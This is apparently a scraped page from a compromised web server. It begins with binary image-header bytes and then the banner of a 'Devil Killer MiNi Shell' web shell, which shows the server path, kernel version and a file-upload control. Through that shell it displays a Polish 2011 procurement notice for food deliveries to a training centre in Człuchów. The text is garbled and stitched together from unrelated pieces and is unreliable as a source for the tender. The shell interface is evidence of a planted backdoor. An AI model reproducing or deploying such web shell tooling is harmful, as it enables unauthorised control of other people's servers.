JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20111129/311385-N-2011.html

<p class="kh_header"><b>Gdańsk: Bezgotówkowa dostawa artykułów żywnościowych niezbędnych do przygotowywania posiłków dla uczestników projektu Czas na Nas. Niepełnosprawni na rynku pracy w Człuchowie w 2012 r. współfinansowanego przez Unię Europejską  ze środków Europejskiego Funduszu Społecznego w ramach POKL</b><br>
<b>Numer ogłoszenia: 311385 - 2011; data zamieszczenia: 29.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy - Pomorska Wojewódzka Komenda , ul. J. Uphagena 27, 80-237 Gdańsk, woj. pomorskie, tel. 58 3017916, faks 58 3017916.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.pomorska.ohp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja rynu pracy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bezgotówkowa dostawa artykułów żywnościowych niezbędnych do przygotowywania posiłków dla uczestników projektu Czas na Nas. Niepełnosprawni na rynku pracy w Człuchowie w 2012 r. współfinansowanego przez Unię Europejską  ze środków Europejskiego Funduszu Społecznego w ramach POKL.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest sukcesywna bezgotówkowa dostawa artykułów żywnościowych niezbędnych do przygotowywania posiłków dla uczestników projektu Czas na Nas. Niepełnosprawni na rynku pracy w Człuchowie w 2012 r. współfinansowanego przez Unię Europejską  ze środków Europejskiego Funduszu Społecznego w ramach POKL od 1 stycznia 2012 r.  do dnia 31 grudnia 2012 roku do: Ośrodka Szkolenia i Wychowania w Człuchowie, ul. Kusocińskiego 4. 
      Przedmiot zamówienia podzielono na piętnaście zadań częściowych:

Zadanie nr 1 - owoce świeże 
Zadanie nr 2 - owoce przetworzone  
Zadanie nr 3 - warzywa świeże 
Zadanie nr 4 - warzywa przetworzone 
Zadanie nr 5 - mrożonki 
Zadanie nr 6 - jaja
Zadanie nr 7 - mięso i produkty mięsne 
Zadanie nr 8 - ryby świeże
Zadanie nr 9 - produkty przemiału ziarna i skrobi - pieczywo 
Zadanie nr 10 - produkty skrobi - mąka  
Zadanie nr 11 - różne produkty spożywcze 
Zadanie nr 12- oleje i tłuszcze roślinne 
Zadanie nr 13 - produkty mleczarskie  
Zadanie nr 14 - napoje   
Zadanie nr 15 - przetwory rybne i ryby wędzone   

2) Dostawa będzie realizowana cyklicznie transportem Wykonawcy i na jego koszt do Ośrodka Szkolenia i Wychowania w Człuchowie, ul. Kusocińskiego 4 (dokładne miejsce na terenie OSiW Człuchów wskazane będzie przez Zamawiającego po podpisaniu umowy).
3) Dostawca realizuje dostawy na własny koszt, transportem przystosowanym do tego celu i spełniającym niezbędne wymagania określone przepisami prawa obowiązującymi w tym zakresie. 
4) Każdy z artykułów powinien być dostarczony w wymaganych opakowaniach. Cykliczne dostawy  będą realizowane od poniedziałku do niedzieli w godzinach od  5.00 do   14.00. najpóźniej na drugi dzień od złożenia zapotrzebowania. Każdorazowa dostawa odbywa się na podstawie wcześniejszego zapotrzebowania określającego dokładną godzinę dostarczenia, datę dostarczenia, ilość, rodzaj artykułów, złożonego nawet w dniu poprzedzającym dostawę (pisemnie, faksem lub telefonicznie). 
Cykliczne dostawy  będą realizowane jak następuje:  
5) Zamawiający powiadomi telefonicznie Wykonawcę, o każdej dostawie oraz wskaże zamawiane artykuły z podaniem ilości.
6) Artykuły muszą spełniać normy jakościowe oraz muszą być dostarczone w ich początkowym okresie gwarancji.
7) Wykonawca powinien zachować odpowiednie warunki  transportu i przechowywania dostarczanego towaru. Każda dostawa artykułów wymagającego załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument. 
8) Wykonawca użyczy nieodpłatnie ewentualnie potrzebnych pojemników przy każdorazowej dostawie artykułów do siedziby Zamawiającego na okres do następnej dostawy.
9) Zamawiający zastrzega sobie prawo zamawiania mniejszej ilości towaru niż określona w ofercie.
Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu zmniejszenia zamówienia. Wykonawcy będzie przysługiwało jedynie wynagrodzenie za zrealizowane dostawy bez naliczania kar umownych w razie zmniejszenia ilości dostaw.
10) W trakcie realizacji zamówienia Zamawiający zastrzega sobie możliwość zamiany proporcji ilościowych poszczególnego asortymentu w stosunku do podanego w formularzu ofertowym. 
11) Wykonawca ma obowiązek uznania reklamacji jakości i ilości dostarczanych artykułów i      dostarczenia nowej partii artykułów do siedziby  Zamawiającego  w dniu złożenia reklamacji.
12) Do składania zamówień Zamawiający upoważni wybranego pracownika.
13) Każda dostawa winna być ubezpieczona przez Wykonawcę na jego koszt w zakresie odpowiedzialności cywilnej.
14)	W przypadku niedostarczenia towaru w wyznaczonym terminie i czasie lub dostarczenia towaru niezgodnie ze złożonym zapotrzebowaniem, Zamawiający zastrzega sobie prawo do zakupu niedostarczonego towaru, a kosztami zakupu (fakturą Vat) obciąży Wykonawcę. Zamawiający powiadomi o tym fakcie Wykonawcę telefonicznie i na piśmie.
15)	Jeżeli w opisie przedmiotu zamówienia znajduje się jakikolwiek znak towarowy, patent czy pochodzenie - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie rozwiązań równoważnych o parametrach techniczno/eksploatacyjno/użytkowych nie gorszych niż te, podane pod pojęciem typu. 
16)	Wykonawca ma obowiązek wystawiać faktury oddzielne na każde zadanie w ramach zamówienia cząstkowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.33.24.00-8, 15.30.00.00-1, 15.50.00.00-3, 15.89.80.00-9, 15.43.00.00-1, 15.41.00.00-5, 15.13.10.00-5, 15.33.24.10-1, 15.22.00.00-6, 15.86.00.00-0, 03.14.25.00-3, 15.30.00.00-1, 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od żądania wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.O udzielenie zamówienia może ubiegać się Wykonawca który spełni warunek określony w art. 22 ust.1 pkt.2</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca, wykaże, iż posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem niniejszego zamówienia na wartość co najmniej 50 000 zł (pięćdziesiąt tysięcy złotych). (należy dołączyć do oferty opłaconą polisę lub inny dokument potwierdzający osiadanie przedmiotowej polisy )</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>19) Zamawiający dopuszcza zmianę postanowień zawartej umowy w zakresie:
a) Zmian organizacyjnych stron np. zmiana reprezentacji lub siedziby firmy. 
b) Zmian osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej  umowy. 
c) W przypadku zmian unormowań prawnych powszechnie obowiązujących np. zmiana urzędowej stawki podatku VAT. W przypadku zmiany obowiązującej stawki podatku VAT, Zamawiający dopuszcza możliwość zmniejszenia lub zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT. Strony dokonają odpowiedniej zmiany wynagrodzenia w przypadku realizacji tej części zamówienia, której w dniu zmiany stawki podatku VAT jeszcze nie dokonano.
d) W innych sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej umowy i mających charakter zmian nieistotnych tzn. takich, o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie lub na wynik postępowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pomorska.ohp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można uzyskać nieodpłatnie  w godz. od 8oo-15 oo  w siedzibie  Zamawiającego,  pokój nr 605, VI piętro - sekretariat ogólny..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.12.2011 godzina 11:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego, ul. J. Uphagena 27, 80-237 Gdańsk
 (sekretariat) 6 piętro, pokój 605:.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Czas na Nas. Niepełnosprawni na rynku pracy w Człuchowie współfinansowanego przez Unię Europejską  ze środków Europejskiego Funduszu Społecznego w ramach POKL.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> arbuz	kg	70
banany	kg	100
brzoskwinie	kg	50
cytryny	kg	10
czereśnie	kg	30
gruszki	kg	50
jabłka	kg	120
kiwi	kg	40
kiwi	szt	30
nektaryny	kg	30
maliny 500g	szt	60
maliny	kg	30
mandarynki	kg	20
pomarancza	kg	50
pomarańcza siatka	kg	40
rabarbar	kg	15
śliwki	kg	30
truskawki	kg	30
winogrona jasne	kg	30
winogrona ciemne	kg	30
wisnie	kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - owoce przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas konserwowany450g	szt	24
brzoskwinie kons.0.9	szt	12
dzem jednorazowy 25g	szt	60
kompot agrestowy 0,9l	szt	5
kompot wiśniowy 0,9 l	szt	5
owoce do ciasta 3 kg(puszka)	szt	3
sok owocowy 2l (różne smaki-pomarańcz	szt	120
grejfrut, jabłkowy, cz.pożeczka, mixitp)		
sok owocowy 1l (różne smaki-pomarań,	szt	120
gruszka, wiśnia, grejfrut,mix itp.)	szt	
sok warzywno-owocowy (marchew-trusk-banan,	szt	360
Marchew-malina-banan, marchew-jabłko-		
banan itp.	szt	
syrop owocowy 6,5l 	szt	12
syrop owocowy 1l 	szt	5
rodzynki suszone 100g	szt	12
rodzynki suszone 0.5 kg	szt	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.24.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - warzywa świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> burak młody	kg	20
burak	kg	150
brokuł	szt	4
cebula	kg	70
cebula młoda	kg	10
cebula czerwona 	kg	10
czosnek	szt	5
czosnek	kg	2
fasola jaś 0,5kg	szt	10
fasola drobna 5kg	szt	1
fasola drobna 0,5 kg	szt	8
fasola jaś	kg	10
fasola szparagowa	kg	10
groch cały	kg	5
groch łuska	szt	12
groch łuskany 5kg	szt	1
jarmuz	kg	1
kabaczek	kg	12
kapusta czerwona	kg	10
kapusta młoda 	szt	45
kapusta 	kg	50
kapusta pekińska	kg	100
kapusta pekińska	szt	20
kapusta włoska	szt 	8
kalafior	szt	10
koper	szt	120
koper duży	szt	1
marchew młoda	kg	10
marchew myta	kg	60
ogórek gruntowy	kg	15
ogórek świeży	kg	50
papryka świeża	kg	15
pietruszka korzeń	kg	30
pomidor	kg	10
por 	szt	24
por 	kg	6
rzodkiewka pęczki	szt	50
sałata	szt	20
sałata dekoracyjna	szt	5
sałata lodowa	szt	5
seler	kg	30
seler naciowa	szt	5
szczypiorek	szt	15
szparagi	szt	3
zielenina natka	szt	121
ziemniaki młode	kg	1300
ziemniaki 	kg	1500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 - warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chrzan tarty 160g	szt	12
chrzan z żurawiną	szt	5
cebulka konserwowa 300g	szt	5
fasolka czerwona konserw.	szt	5
groszek konserwowy 400g	szt	20
groszek z marchewką 0,9l	szt	8
kapusta kiszona  5kg	szt	15
koncentrat pomidorowy 0,9l	szt	16
koncentrat pomidorowy 1l	szt	6
kukurydza konserwowa	szt	25
kukurydza kons. 0,9 l	szt	8
oliwki 200ml	szt	5
oliwki ciemne	szt	5
ogórki kiszone 3kg	szt	10
ogórki małosolne	kg	18
ogórki konserwowe 0,9l	szt	32
papryka konserwowa 0,9l	szt	16
pieczarka	kg	12
pieczarka konserwowa 0,9l	szt	16
pieczarka solona 0.9	szt	8
pieczarka solona 3000ml	szt 	1
seler w słoiku 0,250	szt	6
surówka	kg	3
szczaw konserwowy 0,9l	szt	16.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5 - mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brukselka mroż 0.5 kg	szt	6
brukselka mroż. 2,5 kg	szt	4
brokuły mroż. 2,5 kg	szt	4
frytki  1kg	szt	20
frytki 450g	szt	25
Frytki 1,5 kg	szt	10
Frytki 2 kg	szt	10
groszek mrozony	kg	5
groszek mrozony 2,5 kg	szt	4
hamburger mrozony 	szt	90
kalafior mroz 2,5 kg	szt	6
kalafior mroż	kg	10
marchew mini 2,5 kg	szt	2
marchew kostka 2,5 kg	szt	4
marchew kostka mroż	kg	10
marchew z groszkiem 2,5 kg	szt	4
marchew z groszkiem mroż	kg	10
mieszanka kompotowa 	kg	10
pizza 500g	szt	30
pyzy z mięsem  	kg	30
pyzy z owocami (knedle)	kg	30
Pierożki ravioli 0,5kg	szt	5
Pierożki Ravioli 1 kg	szt	3
szpinak 1kg	szt	3
truskawki mrozone	kg	5
warzywa na patelnię	kg	6
warzywa na pat.chinskie	kg	6
zapiekanka 200g	szt	30
zupa wiosenna	kg	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 - jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jaja klasy M o grmaturze 53-63 gr	szt	1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7 - mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> boczek świeży	kg	6
boczek wędzony gotowany 	kg	6
boczek wędzony surowy	kg	6
ćwiartki tylne drobiowe	kg	30
filet drobiowy	kg	20
filet z piersi kurczaka	kg	80
kflaki wieprzowe	kg	30
flaki wołowe	kg	30
flaki wołowe 1 kg	szt	15
golonka wieprz b/k	kg	10
golonka wiep z kością	kg	10
karkówka wieprz b/k 	kg	80
karkówka wieprz z/k	kg	60
kiełbasa biała parzona	kg	18
kiełbasa biała  surowa	kg	18
kiełbasa śląska  lub równoważna	kg	20
kiełbasa toruńska  lub równoważna	kg	10
kiełbasa typu ogniskowa  lub równoważna	kg	10
korpusy drobiowe(grzbiety)	kg	50
kości wieprzowe	kg	30
kotlet do hamburgera	kg	60
kotlet do hamburgera 250g	szt	90
kurczak świe.	kg	20
łopatka b/k	kg	160
łopatka z kością	kg	10
mięso gulaszowe	kg	30
ozory wieprzowe	kg	20
parówka hot-dog drobiowa	kg	10
parówka w folii	kg	15
parówka wiedenska  lub równoważna	kg	15
rozbeft wołowy	kg	3
serca drobiowe	kg	10
serdelki	kg	15
schab wiep b/k	kg	50
schab wiep z/k	kg	15
skrzydełka z kurczaka	kg	15
słonina	kg	3
udka	kg	300
wątroba drobiowa	kg	21
wątroba wieprzowa	kg	21
wołowina gulaszowa	kg	15
wołowina zrazowa	kg	15
żeberka wiep	kg	30
żebra wołowe	kg	10
żołądki drobiowe	kg	21.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.20-2, 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8 - ryby świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet z morszczuka	kg	20
karp	kg	5
łosoś filet	kg	5
morszczuk filet	kg	10
panga	kg	20
pstrąg świe.	kg	10
śledż św. Filet	kg	12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9 - produkty przemiału ziarna i skrobi - pieczywo.</p>
